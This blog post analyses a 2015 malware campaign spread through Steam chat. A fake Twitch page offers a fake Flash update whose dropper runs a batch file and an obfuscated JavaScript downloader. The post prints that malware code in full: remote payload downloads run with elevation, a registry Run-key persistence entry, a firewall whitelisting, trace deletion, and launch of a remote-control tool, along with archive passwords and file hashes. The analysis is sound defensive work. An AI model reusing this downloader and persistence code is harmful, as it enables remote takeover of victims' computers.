Malware spreads via Steam Chat - including malware analysis


Posted: 2015-12-01 by Admin
Steam is a multi-player platform developed by Valve Corporation. It is used to distribute games and related media online. Steam provides the user with installation and automatic management of software across multiple computers, community features such as friends lists and groups and in-game voice and chat functionality. The malware comes via Steam's built-in chat client, here is example how it works. Steam Chat:
bakonoda: hey bakonoda: just saw your video bakonoda: nice Ace btw bakonoda: http://twitch.lv/xxxxxxxx/v/XXXXXXXX
The link leads to a copy of the Twitch page. The page loads with a fake message that says your Flash player is outdated and provides a link with the Update.
https://copy.com/XXXXXXXXXX?download=1
Name of the downloaded file:
install_flashplayer_29x83_pssd_win.exe
MD5: 2cccc536122a1d91e8bd3c5fa920364a SHA1: 0aaa59a7637b8f22e6d669324c2f8d0c31140b63 SHA256: 195c7ec50f94211d1b4f36e5bf128ac6c15d1fc256302d7f86687cce811a5050 install_flashplayer_29x83_pssd_win.exe drops 3 Files:
flashupd.bat fl.dat flash.exe
After the 3 File are dropped the install_flashplayer_29x83_pssd_win.exe executes the flashupd.bat, a simple Batch file. flashupd.bat:
@echo off flash.exe e -pv1tal -y fl.dat start twflash.exe ping 127.0.0.1 -n 1 start wscript.exe //B //Nologo //T:360 "twflash.js" ping 127.0.0.1 -n 2
flash.exe is a portable commandline app for extracting archives (UNRAR 4.10), which is used to extract the password protected fl.dat archive. (Password: v1tal)
flash.exe e -pv1tal -y fl.dat
2 files will be extracted:
twflash.exe twflash.js
twflash.exe is UNRAR again, seems not to be used. twflash.js is a script for the Windows Script Host with the following content:
x=false?null:"responseBody"; xx=true?"Shell.Application":null; xxx=ActiveXObject; xxxx=false?null:"Scripting.FileSystemObject"; xxxxx=true?"WScript.Shell":null; xxxxxx=false?null:"ExpandEnvironmentStrings"; xxxxxxx=true?"CreateObject":null; xxxxxxxx=false?null:"Msxml2.XMLhttp"; xxxxxxxxx=true?"open":null; (function(c){function a(a,b){if(!b||!a)return null; b=e[xxxxxx](b); var d=WScript[xxxxxxx](xxxxxxxx); d[xxxxxxxxx]("GET",a,!1); d.send(null); var c=new xxx("ADODB.Stream"); with(c)return Mode=3,Type=1,Open(),Write(d[x]),SaveToFile(b,2),Close(),b}fso=new xxx(xxxx); var e=new xxx(xxxxx); c=new xxx(xx); FileDestr=e[xxxxxx]("%APPDATA%\\"); a("https://copy.com/XXX1","%APPDATA%\\9za.exe"); a("https://copy.com/XXX2","%APPDATA%\\sysfile"); a("https://copy.com/XXX3","%APPDATA%\\systfile.cmd"); c.ShellExecute("cmd.exe",'/c"'+FileDestr+'systfile.cmd"',"","runas",0)})(this);
This script is executed in this line from the Batch script:
start wscript.exe //B //Nologo //T:360 "twflash.js"
3 Files are downloaded by the script :
9za.exe sysfile systfile.cmd
9za.exe you know? UNRAR again! sysfile another Archive, 7-zip this time. systfile.cmd a Batch script again. systfile.cmd:
set a=cd set b=attrib set c=taskkill %a% "%APPDATA%" %b% +h "%APPDATA%\systfile.cmd" if exist "%APPDATA%\rtv.bin" goto end "%APPDATA%\9za.exe" x -pv1nj3ct02 -y "%APPDATA%\sysfile" -o"%APPDATA%" %b% +h +s +r "%APPDATA%\sysfiles\*.*" %b% +h +s +r "%APPDATA%\sysfiles" del /f /q "%APPDATA%\sysfile" %a% "%APPDATA%" %a% sysfiles netsh firewall add allowedprogram "%APPDATA%\sysfiles\client32.exe" AppleWebKit ENABLE if exist client32.exe start client32.exe taskkill /f /im rundll32.exe ping 127.0.0.1 -n 1 %c% /f /im rundll32.exe reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "AppleWebKit" /t REG_SZ /d "%APPDATA%\sysfiles\client32.exe" taskkill /f /im client32.exe ping 127.0.0.1 -n 2 if exist client32.exe start client32.exe taskkill /f /im rundll32.exe echo 1>"%APPDATA%\rtv.bin" %b% +s +h "%APPDATA%\rtv.bin" reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "AppleWebKit" /t REG_SZ /d "%APPDATA%\sysfiles\client32.exe" :end %b% -h "%APPDATA%\systfile.cmd" if not exist "%APPDATA%\java.exe" (del /f /q "%APPDATA%\9za.exe") del /f /q "%APPDATA%\sysfile" del /f /q "%APPDATA%\java.exe" del /f /q "%APPDATA%\*.js" del /f /q "%APPDATA%\input" %b% -h "%APPDATA%\systfile.cmd" del /f /q "%APPDATA%\systfile.cmd" del %0
What does the script? First it checks if a file called rtv.bin does exist. The rtv.bin is a Dummy file to make sure that the script is executed only once. This file will be created at the end of the script after its first execution.
echo 1>"%APPDATA%\rtv.bin"
After that check the script extract the sysfile Archive by using the 9za.exe. The Archive is password protected again.(Password: v1nj3ct02)
"%APPDATA%\9za.exe" x -pv1nj3ct02 -y "%APPDATA%\sysfile" -o"%APPDATA%"
A bunch of files will be extracted including a client32.exe. The client32.exe will be added to Windows autorun by that line of the script
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "AppleWebKit" /t REG_SZ /d "%APPDATA%\sysfiles\client32.exe"
and added to the whitelist of the Windows firewall.
netsh firewall add allowedprogram "%APPDATA%\sysfiles\client32.exe" AppleWebKit ENABLE
After that the script deletes itself and all traces. Before the script ends it starts the client32.exe. The client32.exe is identified as NetSupport Manager. NetSupport Manager is a remote control software, allowing remote screen control and systems management. It has a bunch of Features, after the execution the System is fully under the attacker's control.